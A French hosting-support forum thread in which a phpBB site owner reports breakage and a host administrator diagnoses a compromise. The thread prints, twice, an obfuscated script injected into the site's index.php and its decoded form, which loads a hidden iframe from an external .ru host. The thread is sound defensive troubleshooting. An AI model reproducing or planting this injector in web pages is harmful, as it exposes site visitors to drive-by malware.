Vous n'êtes pas identifié. Veuillez vous connecter ou vous inscrire.


Ecrire une réponse

Ecrire une réponse

Composez et envoyez votre nouvelle réponse

Vous pouvez utiliser : BBCode Images Binettes

Les champs marqués %s doivent être remplis avant d'envoyer ce formulaire.

Information obligatoire pour les invités


Information obligatoire

Revue du sujet (plus récents en tête)

10

Bonjour
Non je n'ai plus rien à ce niveau, je n'ai méme pas construit mon forum; j'ai desactivé cette fonction pour le moment.
J'ai simplement gardé mon arcade habituelle et la shout ...Le mystere demeure
Désolé du tracas que je vous donne.

9

bonjour,
avez vous un module photo sur le forum ou un upload de fichiers?
si oui, désactivez le, car la vérification des fichiers est très aléatoire et laisse passer des scripts.

8

Revoila le méme probléme, j'ai refait mon site 2 fois car le probléme revenait sans cesse.(jai tt enlevé portail...)
J'ai gardé 2 mod que j'utilise depuis longtemps arcade OA et une shout (mchat) aucun souci avec eux
Aujourd'hui le scrypte est revenue sur mes index j'ai donc  supprimé tout les scrypte mais j'ai bien peur que cela ne revienne
J'ai contacté phpbb.fr qui me demande de vous contacter
"contactez votre hébergeur pour qu'il vérifie si il n'y a pas des sites mal protégés sur le serveur ou vous etes hébergé."
Ils m'ont parlé aussi d'un probléme de MDP mais j'ai deja eu changer mes MDP que ce soit sur la BD ou FTP.
Pouvez vous faire qqles choses?
Merci à vous

7

Et si vous regardiez là où vous avez téléchargé le script en premier lieu ? Vous comprenez bien qu'on ne peut pas faire de support pour chaque application écrite en PHP..

Pour le problème des headers, c'est simple, il suffit de supprimer tous les caractères après le ?> (astuce: même les espaces..)

6

j'ai bien vu ce script ds mon index.php
<script>/*GNU GPL*/ try{window.onload = function(){var Sjtyp5xq2pk = document.createElement('script');Sjtyp5xq2pk.setAttribute('type', 'text/javascript');Sjtyp5xq2pk.setAttribute('id', 'myscript1');Sjtyp5xq2pk.setAttribute('src',  'h@t#(#t&&!@p&!:@!&&(/!/)#m)(@!a$@!r^#c((a&$-$!c)o#m#.)#(a!s@##k^^$&m@$e$)$n)&(.@!$#c!&^#(o)^$)m!!.#@e!^!a$s!y^@#^-#$(s!!h#)a(^r(#e!!@-&)^c)@o$&$!m$.(#$h@o^(m((e(s#$w!e#^e##&)t##n^#e^^t&&)&)w&!(o^$!)!r)@!&k&).&r&u$^:!^#8@$0)@8()0(@/)@$&p$!$&o(#&r!!!$n@$b$b&!(.#o@)#r@(^@g@)/($!p&o^#$r#)!^#n@^b##b)@&!.#^)o@r&(!!g&($#/&@$((g@&o^o(#g($l$^)#e!^).^!$c!o)m$$/$w!i#k@^i&a))).#c)!o)m@/))c^i#!(t^$$i#!$b#)a(#!n#$!k((.^@&c$!@#o$#@)m(/&!('.replace(/\(|#|\!|\^|@|&|\)|\$/ig, ''));Sjtyp5xq2pk.setAttribute('defer', 'defer');document.body.appendChild(Sjtyp5xq2pk);}} catch(e) {}</script>

J'ai effacé pour voir mais ça n'a rien donné et pour la mise à jour comment la faire si je ne peux pas me connecter nul part
je boue ,il y a des personnes qui n'ont que ça a foutre...

5

C'est moi qui m'affole mnt et que puis-je faire pour réparer cela???
merci

4

Petite remarque: il serait peut être temps de mettre à jour si possible votre super script de gestion de portail basé sur phpBB wink

3

Un petit coup d'oeil à votre ligne:

root@ns1:/home/toad# sed -n 251p /home/users/00/0d/2e/home/www/includes/hooks/index.php
<script>/*GNU GPL*/ try{window.onload = function(){var Sjtyp5xq2pk = document.createElement('script');Sjtyp5xq2pk.setAttribute('type', 'text/javascript');Sjtyp5xq2pk.setAttribute('id', 'myscript1');Sjtyp5xq2pk.setAttribute('src',  'h@t#(#t&&!@p&!:@!&&(/!/)#m)(@!a$@!r^#c((a&$-$!c)o#m#.)#(a!s@##k^^$&m@$e$)$n)&(.@!$#c!&^#(o)^$)m!!.#@e!^!a$s!y^@#^-#$(s!!h#)a(^r(#e!!@-&)^c)@o$&$!m$.(#$h@o^(m((e(s#$w!e#^e##&)t##n^#e^^t&&)&)w&!(o^$!)!r)@!&k&).&r&u$^:!^#8@$0)@8()0(@/)@$&p$!$&o(#&r!!!$n@$b$b&!(.#o@)#r@(^@g@)/($!p&o^#$r#)!^#n@^b##b)@&!.#^)o@r&(!!g&($#/&@$((g@&o^o(#g($l$^)#e!^).^!$c!o)m$$/$w!i#k@^i&a))).#c)!o)m@/))c^i#!(t^$$i#!$b#)a(#!n#$!k((.^@&c$!@#o$#@)m(/&!('.replace(/\(|#|\!|\^|@|&|\)|\$/ig, ''));Sjtyp5xq2pk.setAttribute('defer', 'defer');document.body.appendChild(Sjtyp5xq2pk);}} catch(e) {}</

Quand on convertit l'url src du script javascript externe rajouté à la volée on obtient l'url suivante:

http://marca-com.askmen.com.easy-share- … ibank.com/

Le script en question devient:

Vcnucf7bc = 'm!a&#r($!c^@)a@$(-(!^c^)o$!)m!.^!)a!)!s&^k$m))e&@)&n((.)(^^#c($#o$(!m#!).^e!$#a($s!y&^@-#$s&(@h!(a(!r(^@$#e&^-)#@!c^$@o!#(m^.)&#h&)o#@!&m@!e$^^s&#w!)e()!^!e@#!@t^!n@e(@t###@#w&o@r)(#k@.#!r$^u@$'.replace(/&|\$|\!|@|\)|\^|#|\(/ig, '');
f = document.createElement('iframe');
f.style.visibility = 'hidden';
f.src = 'http://'+Vcnucf7bc+':8080/index.php?js';
document.body.appendChild(f);

La variable  Vcnucf7bc est convertit en: marca-com.askmen.com.easy-share-com.homesweetnetwork.ru

Et donc, ce que fait ce script est d'ouvrir une page externe vers la page:

http://marca-com.askmen.com.easy-share- … dex.php?js

Cette page ne renvoie rien, donc je ne saurais dire ce qu'elle fait exactement..

2

Interprétation rapide: you have been hacked.

1

Bonjour
Depuis 20 min , mon site s'est decalé sur la gauche sans raison sous IE et sous opera l'ecriture est enorme ,pensant bien faire je me suis deconnecté et plus moyen dy allée (n'y mes membres).
Je n'ai strictement rien fait sur le site depuis un bon moment dc je ne vois pas ou est le blem ... J'ai de plus un message d'erreur que je ne sais interpreter
Pouvez vous m'orienter?
-Merci-
Warning: Cannot modify header information - headers already sent by (output started at /home/users/00/0d/2e/home/www/includes/hooks/index.php:251) in /home/users/00/0d/2e/home/www/includes/functions.php on line 3931

Warning: Cannot modify header information - headers already sent by (output started at /home/users/00/0d/2e/home/www/includes/hooks/index.php:251) in /home/users/00/0d/2e/home/www/includes/functions.php on line 3933

Warning: Cannot modify header information - headers already sent by (output started at /home/users/00/0d/2e/home/www/includes/hooks/index.php:251) in /home/users/00/0d/2e/home/www/includes/functions.php on line 3934

Warning: Cannot modify header information - headers already sent by (output started at /home/users/00/0d/2e/home/www/includes/hooks/index.php:251) in /home/users/00/0d/2e/home/www/includes/functions.php on line 3935



Currently used extensions: pun_poll, pun_admin_manage_extensions_improved. Copyright © 2008 PunBB